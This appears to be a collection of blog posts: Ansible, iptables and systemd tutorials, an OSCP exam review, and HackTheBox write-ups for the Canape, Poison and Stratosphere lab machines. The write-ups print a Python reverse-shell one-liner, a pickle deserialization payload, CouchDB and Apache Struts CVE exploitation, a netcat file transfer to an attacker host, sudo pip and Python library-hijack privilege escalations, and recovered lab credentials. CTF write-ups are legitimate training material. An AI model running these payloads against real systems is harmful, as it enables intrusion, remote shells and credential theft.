Introduction to Ansible Part 3

Hi there! It's been a long time since I posted a continuation of the Ansible series. If you have not read parts one and two, they can be found here.

Now let's quickly define our objectives.

  1. Remotely manage (start/stop) the JBoss server with the help of a custom systemd unit file, invoked remotely through Ansible.
  2. Deploy a WAR file on a JBoss application server running on a remote machine.
  3. Undeploy a WAR file from the JBoss server remotely.

As explained in the previous article, we can define static variables and defaults inside the roles/webserver/defaults/main.yml file. So let's define our default variables. Place these in the specified file (on the Ansible server machine):

name: test

Username: DBuser

Password: DBPass

driver: <drivername>

connection_url: <connection_url>

pool_name: <pool_name>

JNDI_HOME: <jndi_home>

filter: "<user-name>{{ Username }}</user-name>"

deployname: warfile.war

deploy_path: /path/to/deployment/scanner/path

DeploySrcTemp: /remotepath/to/deployment

Now let's create a systemd service to control the JBoss server. Let us name it JbossControl.service, with the following content. For a tutorial on systemd, refer to my previous article:



Description=JBoss application server control script

# the script names below are placeholders - point them at your own JBoss install
# (e.g. bin/ to start, bin/ to shut down)
ExecStart=/path/to/jboss/bin/
ExecStop=/path/to/jboss/bin/ --connect command=:shutdown





Save the file on the Ansible server machine and place it at roles/webserver/templates/JbossControl.service.

We now have the resources required for managing a JBoss application server remotely.

On our Ansible server machine, we can now update the roles/webserver/tasks/main.yml file with the following content.


- name: copy jboss service file to systemd folder
    src: "/path/to/ansible/roles/webserver/templates/JbossControl.service"
    dest: /etc/systemd/system/JbossControl.service
  tags: [copyService]

- name: start JBoss service
    name: JbossControl
    state: started
    daemon_reload: yes   # pick up the newly copied unit file
  tags: [StartJboss]

- name: stop JBoss service
    name: JbossControl
    state: stopped
  tags: [StopJboss]


As we see in the tasks file, we have used the systemd module of Ansible to invoke systemd services and targets. We have also used the copy module to copy files from the Ansible server to the remote system. Now we can create a play.yml in the project root directory with the following content:

- hosts: RemoteMachines
  become: yes
    - webserver

Now we can invoke this playbook to start or stop JBoss on the remote machines as follows:

To start the JBoss application server on the remote machines defined under the RemoteMachines group:

> ansible-playbook play.yml --tags "copyService,StartJboss"

To stop the JBoss application server on the remote machines defined under the RemoteMachines group:

> ansible-playbook play.yml --tags "StopJboss"

Here, the --tags option tells ansible-playbook which tasks from the role to run. If we do not specify any tags, every task in the role runs and returns its result.

We have successfully completed the first objective of managing a remote JBoss application server! In the next tutorial we will see how to deploy and undeploy the WAR file remotely, which in turn involves managing data sources and configuration files. Stay tuned!


OSCP Certification Review(Offensive Security Certified Professional)

Hi All! I just wanted to share my experience of my journey through OSCP.

What is OSCP?

OSCP (Offensive Security Certified Professional) is a certification provided by the Offensive Security team. It is achieved by taking the mandatory PWK course from Offsec and passing a 24-hour, fully hands-on practical exam.



Why are you doing it, when there are many reviews available already?!

I come from a "different background" than most of the reviews I have seen. So this is just to add to the long list of reviews already available 🙂

Let's get straight to the main part!

When did you start, and what was your previous job experience?

I started my OSCP journey in the month of June, signing up for 60 days of lab time. I had nearly 1.5 years of previous experience working on application automation and DevOps projects. I was always interested in the penetration testing field and voluntarily took up security testing of the projects I worked on alongside my day-to-day job. I moved to a new team as a full-time web application pentester exactly when my course started.

How did you do in the course and labs?

Coming to the course materials: you get a PDF and videos which help you gain a varied set of skills and techniques, which can then be used in the labs to pwn different machines separated into four network segments. You must pwn machines to gain access to the other networks and finally compromise all the machines in all four networks.

My suggestion is to start working on the lab in parallel with the course PDF and videos, and make the most out of your lab time.

There are extra points (5) given for documenting the exercises and lab machines. I never bothered to do it, but it really is a good thing to document, as it helps with the final reporting.

I was able to pwn around 35+ machines in my first month, including all big four (Pain, Sufferance, Humble and Ghost), and got access to two additional networks.

When my lab time ended, I relied on solving machines on HackTheBox, particularly Windows ones (as that was my weakest point!).

How did you do in the exam?

You need at least 70 out of 100 points to pass the exam. You are given 24 hours to crack the machines in the exam network, and an additional 24 hours to report your findings.

I gained the required points within the first 12 hours of my exam. The key thing is to enumerate each system properly, without jumping in after only partial enumeration. Post exam, I used the official template given by Offsec for my reporting.

I received the mail a day later that I had passed.

Some important supplements to the course materials?

Is Programming essential?

No, but basic knowledge of any scripting language such as Bash or Python will surely help.

If you are planning to take it, do not wait, just enroll! It's a wonderful experience altogether. Just make sure to do a lot of self-research on topics when you are stuck in the labs.

Your final thoughts?

This is one of the best learning experiences I have ever had, because this course forced me to learn many concepts I otherwise wouldn't have touched. I was always a Linux guy; it forced me to learn the Windows environment, and thanks to Offsec, it is really good to step out of your comfort zone! I thank the Offensive Security team for providing such an awesome experience.

HackTheBox – Canape Fastrun WriteUp

Hi All, today we are going to solve the Canape machine from HackTheBox. This walkthrough will be a fast run, as I am still in the hangover of clearing OSCP (:D) and a bit busy, so I shall skip a few commands and give a brief explanation of how I solved this box.


So Lets start with nmap scan : nmap

80/tcp open http

We see only one port open. After a bit of enumeration, dirbusting directories and other things, we find two interesting leads:

  1. A git repository is exposed.
  2. A "submit quotes" page which lets us submit quotes.

There is also a comment in the source code of the page, which points to another interesting page:

From the git repository we download all the files recursively and clone them into a local repo.


root@kali:~/git# ls static templates


We find a few interesting things in the Python code.

The first is the poor input sanitization of the "character" field: the character and submitted quote are written directly to a file whose name is the MD5 of both, as in this line: p_id = md5(char + quote).hexdigest()



if request.method == "POST":
        char = request.form["character"]
        quote = request.form["quote"]
        if not char or not quote:
            error = True
        elif not any(c.lower() in char.lower() for c in WHITELIST):
            error = True
            # TODO - Pickle into dictionary instead, `check` is ready
            p_id = md5(char + quote).hexdigest()
            outfile = open("/tmp/" + p_id + ".p", "wb")
            outfile.write(char + quote)
            success = True
    except Exception as ex:
        error = True

return render_template("submit.html", error=error, success=success)



The next thing is that in the check page code, we can see it uses pickle to deserialize the stored object from the file. The way pickle handles untrusted data is well known to lead to RCE.

More on this vulnerability explained :

So our strategy is to craft a payload inside the character field and exploit the vuln by calling the check page with our malicious MD5-named file. (Too lazy to share the exploit 😀 write it yourself, this is a fast run! I shall share the git link :P)

character = reverse shell payload + "Homer"

Once the quote request is posted, we access the check page with the file named after the MD5 hash we already calculated. I used a Python reverse shell payload from Pentest Monkey.


python -c "import os; import pty; import socket; lhost = ''; lport = 443; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();"

This is then used as shown in the exploit: a class object with a __reduce__ method, converted into pickle format using cPickle.dumps (you will find it in the script), and posted in the request to quotes.
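Putting those two pieces together, here is a minimal sketch of the payload idea in Python 3 (the original exploit used cPickle on Python 2; the command, the quote text and the "Homer" suffix are hypothetical stand-ins for the whitelist trick described above):

```python
import os
import pickle
from hashlib import md5

CMD = "true"  # stand-in for the reverse shell one-liner

class Payload(object):
    # pickle calls __reduce__ while serializing; on deserialization the
    # returned callable is invoked, i.e. os.system(CMD) runs
    def __reduce__(self):
        return (os.system, (CMD,))

# the "character" field: pickle payload plus a whitelisted name
char = pickle.dumps(Payload(), protocol=0).decode() + "Homer"
quote = "some quote"

# the app writes char + quote to /tmp/<p_id>.p, so we can precompute
# the file name the check page has to be pointed at
p_id = md5((char + quote).encode()).hexdigest()

# unpickling the stored blob is what fires the command; bytes after
# the pickle STOP opcode (the "Homer..." suffix) are ignored
result = pickle.loads((char + quote).encode())
print(p_id, result)
```

On the real box the deserialization happens server-side when the check page loads /tmp/<p_id>.p; here, result is simply os.system's exit status.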

Then we post a request to the check page with the MD5-named file.

We get a quick reverse shell ! 😀

root@kali:~# nc -nlvp 443
listening on [any] 443 …
connect to [] from (UNKNOWN) [] 58594

But we are still a low-privileged www-data user who does not have access to the user flag.

so lets enum more :

from /etc/passwd :

we find a valid user :


Enumerating further, we find that it is running CouchDB as its backend database, and also a few interesting things in the /var/www folder.

We can confirm CouchDB is running:

www-data@canape:/var/www/git$ curl -s http://localhost:5984
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}

This version is vulnerable to a privilege escalation that lets us create an admin user (CVE-2017-12635).

now we can exploit it like this :

www-data@canape:/var/www/git$ python localhost -p 5984 -u menoe -P menoe
[+] User to create: menoe
[+] Password: menoe
[+] Attacking host localhost on port 5984
[+] User menoe with password menoe successfully created.

Now let's use this user to fetch juicy database details (*after a long look at the CouchDB docs!*). After a few minutes of enumeration, the password was found to be stored in the following document:

www-data@canape:/var/www/git$ curl -s http://menoe:menoe@localhost:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4

www-data@canape:/var/www/git$ su homer
Password: 0B4jyA0xtytZi7esBNGp

homer@canape:/var/www/git$ whoami

And now we can grab the user.txt flag! Let's move on to privilege escalation.

From quick enumeration, we find that homer can execute a few commands as root:

homer@canape:/var/www/git$ sudo -l

User homer may run the following commands on canape:
(root) /usr/bin/pip install *

A classic privesc scenario: a wildcard entry for pip install! Let's create a temporary folder and add a inside it with our privilege-escalation code 🙂 Here we have created a folder called privesc, and inside it a file containing the following code to steal the root flag (we can replace this with any privileged code to execute).

homer@canape:/tmp/privesc$ cat

import os
os.system("cat /root/root.txt > /tmp/root.txt")
os.system("chmod 777 /tmp/root.txt")


We can leverage the pip -e option to install from a local package directory. Finally, run this command to get the root flag!

homer@canape:/tmp/privesc$ sudo /usr/bin/pip install -e /tmp/privesc/

The command exits with a "no files/directories" error, but our code will already have run. Let's verify:

homer@canape:/tmp$ ls -l /tmp/root.txt
-rwxrwxrwx 1 root root 33 Sep 15 10:53 /tmp/root.txt

That's awesome! Now let's quickly grab our root flag 😀

homer@canape:/tmp$ cat /tmp/root.txt
<<root flag contents >>


That's all for this fast run! Thank you, and stay tuned for the next writeup. Have a nice day!

HackTheBox – Poison Writeup

The Poison machine on HackTheBox retired today, anddd I will explain how I solved it. This box was one of the earlier machines I attempted, and it is a fairly easy one to crack.

Let's begin our enumeration with an Nmap scan.

nmap -sC -sV -T4

Nmap scan report for
Host is up (0.24s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

From the Nmap scan, we have two ports (22 and 80) open. It makes sense to start our enumeration with the web server port.

On navigating to,

we find an interesting portal which displays,

Temporary website to test local .php scripts.

Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php


So let's navigate to listfiles.php, as it seems interesting.

we are greeted with the following content :

Array( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt)

Again, pwdbackup.txt looks interesting. Let's navigate to it:

displays :

This password is secure, it’s encoded atleast 13 times.. what could go wrong really..


As we see, the encoding appears to be Base64, so we decode the text 13 times.

Final decoded value: Charix!2#4%6&8(0
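The 13 rounds can be undone with a short loop. A minimal sketch (the original pwdbackup.txt blob is not reproduced here, so we simulate the encoding first, using the value recovered in the writeup):

```python
import base64

password = b"Charix!2#4%6&8(0"   # the value recovered in the writeup

# simulate pwdbackup.txt: the password base64-encoded 13 times
blob = password
for _ in range(13):
    blob = base64.b64encode(blob)

# undo the 13 rounds to get the plaintext back
for _ in range(13):
    blob = base64.b64decode(blob)

print(blob.decode())             # the recovered password
```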

So it appears to be credentials of some sort, and the username appears to be charix.

Lets use these credentials to connect through SSH .

ssh charix@

charix@Poison:~ % whoami

Andd we are in!

Grab the user flag, and let's continue our enumeration!

charix@Poison:~ % ls user.txt

We find an interesting password-protected zip file. For some reason I was unable to unzip it on the remote machine, so I copied it to my local machine using netcat:

on our local  machine : nc -nlvp 1234

on victim machine : nc -w 3 -nv attacker_ip 1234 <

Unzip the file with the same password that was used for SSH: unzip

We get a file named secret as the content of the zip. We also find that there is a VNC server running as root on the victim machine.

charix@Poison:~ % ps -aux | grep root


root 529 0.0 0.7 23620 7148 v0- I Mon05 0:00.14 Xvnc :1 -deskto
root 540 0.0 0.3 67220 3288 v0- I Mon05 0:00.04 xterm -geometry


charix@Poison:~ %netstat -a


tcp4 0 0 localhost.5801 *.* LISTEN
tcp4 0 0 localhost.5901 *.* LISTEN


As it is listening only on localhost and cannot be accessed from outside, we have to use local port forwarding to connect to it.

Let's create an SSH tunnel to forward the VNC port locally.

on one of our terminal,

ssh -L 2345:localhost:5901 charix@

Once connected, minimize the terminal to leave the session open.

The interpretation of this command: we are instructing SSH to listen on port 2345 on our local machine; whatever request hits port 2345 on our machine will be forwarded through the SSH tunnel to port 5901 on the server machine (i.e. the Poison machine).

Here, localhost should not be confused with our local machine; it refers to localhost on the server machine (i.e. the Poison machine).

Now, in a new terminal, let's connect to the VNC server with the extracted secret file as the password:

vncviewer -passwd secret

We get a VNC session as the root user! Grab the root.txt flag anndd keep pwning!

stay tuned for more write ups. Have a wonderful day ahead! 🙂



HackTheBox – Stratosphere Writeup

Hi All, the Stratosphere machine retired today on HackTheBox andddd YES, I will explain how I solved it. This was a medium-difficulty box and one of the more interesting ones, with a nice privilege escalation technique.

Check out HackTheBox for upskilling your pentest game:

Let's begin with a basic nmap scan.


root@kali:~# nmap -sC -sV -T4

Starting Nmap 7.60 ( ) at 2018-08-31 21:57 IST
Nmap scan report for
Host is up (0.19s latency).
Not shown: 997 filtered ports
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (EdDSA)
80/tcp open http

From the nmap scan we have three ports open, of which ports 80 and 22 are notable. It makes sense to start our enumeration with web port 80.

From the DirBuster bruteforce, we find that there is a hidden site hosted at

After a quick enumeration, we find that the site is built using Apache Struts and is vulnerable to CVE-2017-5638.

POC can be found here :

We can get code execution by running the POC script as follows.

python -u -c 'cat /etc/passwd'


richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash


From the /etc/passwd file, we see a user named 'richard' active on the machine.

Similarly, we find that it is running MySQL with credentials 'admin'/'admin', from a file named db_connect. But since MySQL is not exposed publicly, we have to rely on our previously found RCE to execute SQL commands. This can be done as follows:

python -u -c 'mysql -u admin -padmin users -e "show tables;"'

From dumping the tables, we find a table named 'accounts'.

Further dumping of the accounts table reveals credentials:

python -u -c 'mysql -u admin -padmin users -e "select * from accounts;"'

fullName            password                     username
Richard F. Smith    9tc*rhKuG5TyXvUJOrE^5CK7k    richard

These credentials can be used to connect over SSH on port 22, which gives us the user flag.

richard@stratosphere:~$ ls
Desktop           __pycache__          user.txt


From quick enumeration, we find that richard can execute a few commands as root:

richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
env_reset, mail_badpass,

User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/

Also, a quick look at the source of reveals that it uses the hashlib library.

import hashlib


We can use a classic Python privilege escalation technique, library hijacking, where we exploit how Python looks up imported libraries.

Since we have write permission to the working directory of the privileged Python file, we can create a file named '' with our custom code. This makes the Python import machinery pick up our file instead of the intended standard library module, because the script's own directory is searched first.

Create a file named '' in the same directory as '', with the following content to display the contents of root.txt and spawn a root shell:

import os
import pty
os.system('cat /root/root.txt')
pty.spawn('/bin/bash')

Now let's execute the following command to gain ROOT!

richard@stratosphere:~$ sudo /usr/bin/python3 /home/richard/


Thank you. Stay tuned for the next write-up!




Introduction to Ansible : Part 2

In the previous post, we gave a basic introduction to Ansible and its advantages. In this post, let's build a skeleton of the project hierarchy we will follow. I will explain what each part of this structure does and how it benefits us.

Before we dive into the structure: Ansible uses YAML syntax inside files called playbooks (a playbook is simply a file with a set of tasks bundled together). If you are not comfortable with YAML syntax, or want to skim through it, please refer to the Ansible documentation; they have the best explanation out there.

Now let's create our first basic Ansible playbook.

Create a file named test.yml inside the project folder, and paste in this content.

- hosts: remoteMachines
    - shell: echo "Hi!"

Save the file. Before running it, append this to each host entry under remoteMachines in the hosts file we created in the previous tutorial,

like this:

<host1-ip> ansible_user=sshuser1
<host2-ip> ansible_user=sshuser2

This specifies the user used to SSH into the remote host. (By default it takes the current user of the Ansible server machine.)


and to run the playbook we just created , use the following command :

> ansible-playbook  test.yml

This should return "Hi!" in the output from both remote machines. In the playbook we just created, hosts specifies the hosts we want to run the tasks on, and there is a single task which uses the shell module to run the echo "Hi!" command.

Now let's assume a scenario in which we have many common tasks to be run across multiple playbooks. To address this, we will follow a specific structure, and to reuse tasks across playbooks we will use a feature called "roles".

Inside the project folder, create a folder called "roles". Inside the roles directory, create another folder named after the role we want to use (e.g. webserver).

Inside the webserver folder we will create these folders and files. The hierarchy is as follows:

roles > webserver > defaults > main.yml

roles > webserver > tasks > main.yml

roles > webserver > handlers > main.yml

roles > webserver > templates

Inside the defaults folder, the main.yml file holds variables and default values as "name: value" pairs. These are used extensively in playbooks and templates, and exist to increase reusability.

Inside the tasks folder, the main.yml file holds the set of tasks associated with the role.

Inside the handlers folder, we find the handlers associated with the tasks. Handlers are similar to tasks; the only difference is that handlers are invoked only by another task.

Inside the templates folder, we find templates: configuration files whose changing values are placeholders that get replaced with values from the defaults folder. They are processed by the Jinja2 template language.
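As a minimal sketch (the file names and the greeting variable here are hypothetical, not from this article), a default and a template that consumes it could look like this:

```
# roles/webserver/defaults/main.yml
greeting: "Hi!"

# roles/webserver/templates/motd.j2
Message of the day: {{ greeting }}
```

When the role renders the template, Jinja2 substitutes {{ greeting }} with the default value, or with any override supplied by the playbook.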

Now, in order to run this role, create a file named play.yml inside the project root folder with the following content, and save it:

- hosts: remoteMachines
    - webserver

As we can see, the different types of functionality are cleanly separated, and reusability of tasks is achieved through the concept of roles.

In the next tutorial, we will use this hierarchy to write a functional role and execute the playbook. Thank you!


Introduction to Ansible : Part 1

In one of my recent projects, I had a specific task: to automate JBoss application server deployment. Since it was running on an Ubuntu machine, I thought of automating the whole process. I had several options; I chose Ansible, as it satisfied all my requirements with less server administration overhead.

In this article we will look at the basics of Ansible; we will cover more extensive features in later tutorials.

What is Ansible?

Ansible is an infrastructure automation tool, widely used for automating the day-to-day management of remote servers.

Why Ansible?

Management of multiple Linux remote hosts over SSH, in parallel.

Also supports Windows environments, using PowerShell.

Easy to use and works out of the box; no overhead of installing extra tools on slave machines (relies on SSH for control).

Uses the concept of states: the current state and the desired state of the task at hand are compared, and if they already match, the task returns the existing state without making changes.
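That state comparison is what makes tasks idempotent. As a hedged sketch (the module arguments are just examples, not from this article): running the play below twice reports the task as "changed" on the first run and "ok" on the second, because the directory already matches the desired state.

```yaml
- hosts: myMachine
  connection: local
    - name: ensure /tmp/ansible-demo exists
        path: /tmp/ansible-demo
        state: directory
```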

You can read more about Ansible  :

The main goal of this tutorial: have a centralized server with Ansible installed, controlling remote (slave) machines to accomplish specific tasks.

Let's now set up Ansible on the server machine.

How To install Ansible ?

You can install Ansible as a python pip package.

> pip install ansible

Once done, create a test project folder, and inside it create an inventory file named "hosts". This file is used to define the groups of machines we would like to manage remotely. (Use your favourite text editor and save this as its content.)

Content of the hosts file:


As we can see, there are two groups, labelled myMachine and remoteMachines, to administer different sets of machines. myMachine controls my local machine, whereas remoteMachines controls other machines in the network.

Note: as a prerequisite, the server machine should be configured for passwordless (key-based) SSH to the slave machines, to avoid specifying credentials at runtime.

Now let's run a simple task against myMachine (that is, localhost):

> ansible -i hosts myMachine --connection=local -m ping


Here, the -i parameter specifies the inventory file name, in this case "hosts". myMachine specifies the group label of the machines on which the task has to run. "--connection=local" specifies that the command runs on localhost (without SSH). The -m argument specifies the module to use; here we use the ping module. (We will see more modules in upcoming tutorials.)

The typical response should be:

localhost | success >> {
    "changed": false,
    "ping": "pong"

If you have successfully completed this, congratulations, you have run your first Ansible task! In upcoming tutorials, we will look at more granular ways of running tasks using the concept of roles.


Introduction to iptables and configure linux firewall rules

In this article, we will see an introduction to iptables and how to write basic packet-filtering rules, along with a glimpse at how iptables interacts with netfilter hooks to carry out its functionality.

Iptables is a Linux firewall administration utility which helps with packet filtering and NAT (Network Address Translation).

Iptables acts as an interface for a user to carry out filtering, mangling of packets, and NAT. Its operation relies on netfilter hooks. 'netfilter' is essentially a series of hooks at various points of the kernel network protocol stack. Whenever a packet arrives at (or leaves) an interface, kernel modules registered at these hooks are triggered according to the priority provided.

There are five hooks in total that a program can register with, to manipulate or verify packets:

  1. NF_IP_PRE_ROUTING: the packet has just entered the network stack. This hook is triggered first, before the routing decision about the destination is made.
  2. NF_IP_FORWARD: triggered only when the routing decision says the destination is not the local system, and the packet is to be forwarded elsewhere.
  3. NF_IP_LOCAL_IN: triggered when the local system is the destination.
  4. NF_IP_LOCAL_OUT: triggered when the packet originates from the local system and is about to leave via the network interface.
  5. NF_IP_POST_ROUTING: triggered after routing, for forwarded or locally generated packets, just before they leave the network interface.

Note: each packet entering or leaving the network interface is stored as an instance of the sk_buff structure, and the hooks operate on this sk_buff structure for packet filtering.

iptables consists of tables, defined by functionality. These tables consist of chains, and the chains in turn consist of rules to be matched.

Different tables:

  1. Filter (default)
  2. NAT
  3. Mangle
  4. Raw
  5. security

Different chains:

  1. PREROUTING
  2. INPUT
  3. FORWARD
  4. OUTPUT
  5. POSTROUTING


As said earlier, the chains of the various tables are triggered at the five hooks, with defined priority, and their rules are evaluated sequentially.

Now let's focus on defining rules for the filter table. This table has three chains: INPUT, OUTPUT and FORWARD.

Each of these chains can hold rules which are applied to the packets in question. If none of the rules match a packet, the default policy is applied. You can set the default policy of each chain as follows,

iptables -t filter -P INPUT DROP

iptables -t filter -P OUTPUT ACCEPT

iptables -t filter -P FORWARD DROP


> The first rule sets the default policy (-P) of the INPUT chain to DROP: the packet is dropped by default if it matches no rule in the chain.

> The second rule sets the default policy of the OUTPUT chain to ACCEPT: the packet is accepted by default if it matches no rule in the chain.

> The third rule sets the default policy of the FORWARD chain to DROP. (Note that a chain policy can only be one of the built-in targets ACCEPT or DROP; to send an error response instead, append a catch-all rule with the REJECT target at the end of the chain.)

Now we can append the custom rules to each of the chain.

ex 1: iptables -t filter -A INPUT -p tcp -s <src-ip> --dport 80 -j ACCEPT

Here, this rule says: in the filter table (-t), append (-A) a rule to the INPUT chain for protocol (-p) tcp, with packet source (-s) <src-ip> and destination port (--dport) 80, and ACCEPT the packet (the -j target).

ex 2: iptables -t filter -A OUTPUT -p tcp -d <dst-ip> --sport 80 -j DROP

Here, this rule says: in the filter table (-t), append (-A) a rule to the OUTPUT chain for protocol (-p) tcp, with packet destination (-d) <dst-ip> and source port (--sport) 80, and DROP the packet (the -j target).

we can view the list of rules for each of the table using,

 iptables -t [table name] -L

We can make use of the conntrack module to track the state of each TCP/UDP connection.

ex: iptables -A INPUT -p tcp --dport 80 -s <src-ip> -m conntrack --ctstate NEW -j ACCEPT

Here, we are using the conntrack module to accept the packet only if the connection state is NEW (the first packet of a new connection).

furthermore,  this feature  helps in deciding which packet belongs to which session/connection.

The only downside is that as the magnitude of traffic increases, the cost of maintaining state becomes very high.

we can also enable logging and use it on a specific rule as shown below :

iptables -A INPUT -s <src-ip> -j LOG --log-level 4 --log-prefix "/Admin"

This would effectively enable logging for the input connections matching the rule in the chain.


For detailed information regarding the netfilter architecture, visit:

Introduction to Initialization systems and creating your first Systemd service

In this post, we will see what an initialization system is, and finally we will create a service for the popular, modern initialization system 'systemd'.

What is an Initialization system?

The init system daemon is the first process spawned by the kernel when a server boots. It carries out major initialization and management of services that are crucial to system operation, and also manages services across different runlevels: for example, spawning a getty login shell on startup. There can be custom services too, such as starting the 'ssh' service on startup.

 Note : Initialization system has process ID = 1  and parent process ID = 0 .

There are many initialization systems available. A few of the popular ones are SysVinit, Upstart and systemd.

SysVinit is one of the simplest init systems; it mainly handles static events, such as loading all services once the system boots. It lacks handling of dynamic events such as pluggable USB devices, hotplugs and external SSDs. SysVinit manages the services required based on the default runlevel specified (the default runlevel is 5, i.e. graphical mode). The scripts inside the folders /etc/rc.d/rcX.d, where X = 0,1,2,3,4,5,6, specify which services are run for a particular runlevel on startup.

Note: you can change the runlevel of a system using 'init <runlevel>'.

Example: 'init 0' effectively halts or shuts down the system.

Upstart is another initialization system, designed to handle dynamic events instead of a predefined sequence of service activation. It uses the concept of jobs, which initialize and monitor services.

systemd is the recent replacement for the other init daemons, and the most complex of them all. Its specialty is that it can start services in parallel. Above all, systemd manages 'units'.

There are 8 types of unit files in total; we will focus mainly on two: service unit files and target unit files.

Service unit files are used to manage individual services. Target unit files are collections of services, which collectively form the equivalent of a system runlevel.

System specific service files reside under ‘/lib/systemd/system’ directory , whereas Custom user service files reside under ‘/etc/systemd/system’ directory.

Main service/target handling commands :

Start a service / target file: systemctl start unitname.service
or systemctl start

ex : systemctl start apache2.service

Stop a service / target file: systemctl stop unitname.service
or systemctl stop

ex :  systemctl stop apache2.service

Status of a service / target file :  systemctl status unitfile.service

ex : systemctl status apache2.service

restart a service unit file :  systemctl restart unitfile.service

ex : systemctl restart apache2.service

enable a service on start-up: systemctl enable unitfile.service

ex : systemctl enable ssh.service

disable a service on start-up: systemctl disable unitfile.service

ex : systemctl disable ssh.service

Note: the .service extension can be omitted; it is assumed by default.

Now Lets create a custom service unit file and see the required procedure to enable one.

  1. Create a file with the extension .service (here, myservice.service), with the following content.

Description=Trial service

ExecStart=/bin/sh -c "runtime"
ExecStop=/bin/sh -c "uname -a"


The above content defines a unit with the required description and the attributes of the service, such as 'Type', which specifies whether the service is oneshot, forking, simple, notify or idle. Here we use oneshot, which means it executes an action and exits immediately; this is why the 'RemainAfterExit' attribute is also set. 'ExecStart' is the command executed when the unit is started, and 'ExecStop' the command executed when the unit is stopped. Finally, the WantedBy attribute specifies the target that pulls in this service when it initializes.

2. Move the myservice.service unit file to the /etc/systemd/system directory, and finally start the service:

systemctl start myservice.service

The following snaps capture the status of the service once started and then stopped.

img (a): status after starting the service; in the journal logs shown by systemctl we can see that the command defined in the ExecStart attribute executed successfully, and its output appears in the logs.


img (b): status after stopping the service; in the journal logs shown by systemctl we can see that the command defined in the ExecStop attribute executed successfully, and its output appears in the logs.

We have successfully created a simple service file and started it. If we want it to start at boot, we can use the enable command described above; this effectively creates a symbolic link, with the same service name, in the target's directory.

Note: we can also make use of other attributes such as ExecStartPre, ExecStopPost, etc.

Detailed documentation can be found on the systemd official website: